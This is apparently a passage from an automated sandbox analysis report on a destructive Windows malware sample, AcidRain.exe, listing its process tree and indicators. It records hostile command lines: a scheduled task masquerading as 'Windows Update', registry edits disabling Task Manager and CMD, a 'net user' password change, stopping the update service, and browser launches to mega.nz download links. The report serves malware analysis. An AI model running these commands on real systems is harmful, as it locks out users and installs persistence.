4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe
4180	taskmgr.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

mspaint.exemspaint.exeSearchApp.exe

pid process

2040 mspaint.exe
2040 mspaint.exe
2040 mspaint.exe
2040 mspaint.exe
1108 mspaint.exe
1108 mspaint.exe
1108 mspaint.exe
1108 mspaint.exe
2388 SearchApp.exe

pid	process
2040	mspaint.exe
2040	mspaint.exe
2040	mspaint.exe
2040	mspaint.exe
1108	mspaint.exe
1108	mspaint.exe
1108	mspaint.exe
1108	mspaint.exe
2388	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AcidRain.exeNyanCatIsHere.exeAcid Rain.execmd.exemsedge.exenet.exenet.exe

description	pid	process	target process
PID 1812 wrote to memory of 4864	1812	AcidRain.exe	NyanCatIsHere.exe
PID 1812 wrote to memory of 4864	1812	AcidRain.exe	NyanCatIsHere.exe
PID 1812 wrote to memory of 4864	1812	AcidRain.exe	NyanCatIsHere.exe
PID 1812 wrote to memory of 2004	1812	AcidRain.exe	Acid Rain.exe
PID 1812 wrote to memory of 2004	1812	AcidRain.exe	Acid Rain.exe
PID 1812 wrote to memory of 2004	1812	AcidRain.exe	Acid Rain.exe
PID 4864 wrote to memory of 4480	4864	NyanCatIsHere.exe	schtasks.exe
PID 4864 wrote to memory of 4480	4864	NyanCatIsHere.exe	schtasks.exe
PID 4864 wrote to memory of 4480	4864	NyanCatIsHere.exe	schtasks.exe
PID 2004 wrote to memory of 672	2004	Acid Rain.exe	cmd.exe
PID 2004 wrote to memory of 672	2004	Acid Rain.exe	cmd.exe
PID 2004 wrote to memory of 672	2004	Acid Rain.exe	cmd.exe
PID 672 wrote to memory of 616	672	cmd.exe	msedge.exe
PID 672 wrote to memory of 616	672	cmd.exe	msedge.exe
PID 672 wrote to memory of 3620	672	cmd.exe	reg.exe
PID 672 wrote to memory of 3620	672	cmd.exe	reg.exe
PID 672 wrote to memory of 3620	672	cmd.exe	reg.exe
PID 672 wrote to memory of 3836	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 3836	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 3836	672	cmd.exe	timeout.exe
PID 616 wrote to memory of 4348	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4348	616	msedge.exe	msedge.exe
PID 672 wrote to memory of 772	672	cmd.exe	net.exe
PID 672 wrote to memory of 772	672	cmd.exe	net.exe
PID 672 wrote to memory of 772	672	cmd.exe	net.exe
PID 772 wrote to memory of 1392	772	net.exe	net1.exe
PID 772 wrote to memory of 1392	772	net.exe	net1.exe
PID 772 wrote to memory of 1392	772	net.exe	net1.exe
PID 672 wrote to memory of 4504	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 4504	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 4504	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 1512	672	cmd.exe	net.exe
PID 672 wrote to memory of 1512	672	cmd.exe	net.exe
PID 672 wrote to memory of 1512	672	cmd.exe	net.exe
PID 1512 wrote to memory of 2756	1512	net.exe	net1.exe
PID 1512 wrote to memory of 2756	1512	net.exe	net1.exe
PID 1512 wrote to memory of 2756	1512	net.exe	net1.exe
PID 672 wrote to memory of 3172	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 3172	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 3172	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 1548	672	cmd.exe	reg.exe
PID 672 wrote to memory of 1548	672	cmd.exe	reg.exe
PID 672 wrote to memory of 1548	672	cmd.exe	reg.exe
PID 672 wrote to memory of 3560	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 3560	672	cmd.exe	timeout.exe
PID 672 wrote to memory of 3560	672	cmd.exe	timeout.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe
PID 616 wrote to memory of 4536	616	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1812

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
3⤵
- Creates scheduled task(s)
PID:4480

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\Acid Rain.bat" "
3⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops startup file
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/enh1BYrI#N5sD3k_HwM4hL3-l-w2Ahb6uP2I-LyVeKgGO-CmfJA0
4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:4348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
5⤵
PID:4536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
5⤵
PID:1788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
5⤵
PID:4996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
5⤵
PID:2636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5288 /prefetch:8
5⤵
PID:3816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
5⤵
PID:4160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
5⤵
PID:4760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5560 /prefetch:8
5⤵
PID:3956

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6388 /prefetch:8
5⤵
PID:3048

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
PID:1904

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x200,0x22c,0x7ff66b545460,0x7ff66b545470,0x7ff66b545480
6⤵
PID:1428

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6388 /prefetch:8
5⤵
PID:3968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
5⤵
PID:3972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:8
5⤵
PID:1116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3396 /prefetch:8
5⤵
PID:4060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:1
5⤵
PID:652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
5⤵
PID:2496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1864 /prefetch:2
5⤵
PID:5024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2632 /prefetch:1
5⤵
PID:4560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1
5⤵
PID:3432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
5⤵
PID:100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=192 /prefetch:8
5⤵
PID:3648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
5⤵
PID:4692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
5⤵
PID:3404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
5⤵
PID:3172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
5⤵
PID:3704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
5⤵
PID:5180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
5⤵
PID:5436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8008 /prefetch:1
5⤵
PID:5460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
5⤵
PID:5612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8540 /prefetch:8
5⤵
PID:5896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:8
5⤵
PID:6044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4112 /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1340 /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4992

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
4⤵
- Modifies registry key
PID:3620

C:\Windows\SysWOW64\timeout.exe
Timeout 1
4⤵
- Delays execution with timeout.exe
PID:3836

C:\Windows\SysWOW64\net.exe
net user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
4⤵
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
5⤵
PID:1392

C:\Windows\SysWOW64\timeout.exe
Timeout 1
4⤵
- Delays execution with timeout.exe
PID:4504

C:\Windows\SysWOW64\net.exe
net stop wuauserv
4⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wuauserv
5⤵
PID:2756

C:\Windows\SysWOW64\timeout.exe
Timeout 1
4⤵
- Delays execution with timeout.exe
PID:3172

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002
4⤵
- Modifies registry key
PID:1548

C:\Windows\SysWOW64\timeout.exe
Timeout 50
4⤵
- Delays execution with timeout.exe
PID:3560

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs"
4⤵
PID:1324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/ZXMSRSgb#CZCknCulyrMI41JcV-HN4mth37dIfpkEw6156NbD410
4⤵
PID:4936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:1820

C:\Windows\SysWOW64\timeout.exe
Timeout 65
4⤵
- Delays execution with timeout.exe
PID:3500

C:\Windows\SysWOW64\mspaint.exe
mspaint
4⤵
- Suspicious use of SetWindowsHookEx
PID:2040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+virus
4⤵
PID:1576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
5⤵
PID:1684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+speed+up+your+computer
4⤵
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
